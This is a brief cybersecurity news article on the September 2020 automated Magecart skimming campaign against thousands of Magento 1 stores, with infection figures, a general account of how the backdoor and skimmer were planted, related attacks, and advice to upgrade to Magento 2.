The Largest Automated Magento Hack In Five Years

E-commerce stores running older Magento version 1 have been facing the risk of cyberattacks ever since End-of-Life (EoL) was announced for this product in June 2020. In the same vein, in April, Visa had urged online merchants to migrate their infrastructure to Magento 2.x. Recently, an automated Magecart campaign was found targeting thousands of vulnerable e-commerce stores globally with a unique skimmer.

From the beginning

According to Sanguine Security (Sansec), over 2,000 Magento 1 sites were attacked to steal credit card details with an automated skimming script.
  • On September 11, ten stores were infected with a unique credit card skimming script, which ramped up the next day with 1,058 sites hacked, 603 more on September 13, and an additional 233 on September 14 in a classic Magecart attack pattern.
  • The attackers used the Magento Connect feature to download and install several malicious files, including a backdoor called mysql.php, and automatically deleted these files when the code was added to prototype.js (Magento 1 sites) and jquery.js (Magento 2 sites).
  • The campaign started with a zero-day vulnerability sold on hacker forums by a threat actor named ‘z3r0day’ in August.

Magecart era

There has been an increment in the number of e-commerce sites targeted by Magecart and related groups in the past few months.
  • Magecart attackers were found using the encrypted messaging service Telegram as a data-exfiltration mechanism. 
  • In July, attackers had targeted online stores of large U.S. retailers and organizations such as Technokain Solutions, Consumer Electronics Show, Consumer Technology and Association, Claire's, using the Magecart attack.
  • In June, the Magecart group had targeted the websites of eight U.S. cities—across three states—with payment card-stealing Magecart skimmers.

The bottom line

The massive scale of September’s latest incidents illustrates the increased sophistication and profitability of web skimming. MageCart attacks have become a large enough problem for all Magento developers and users. For better security, it is recommended to upgrade all Magento infrastructure Magento 2 as early as possible.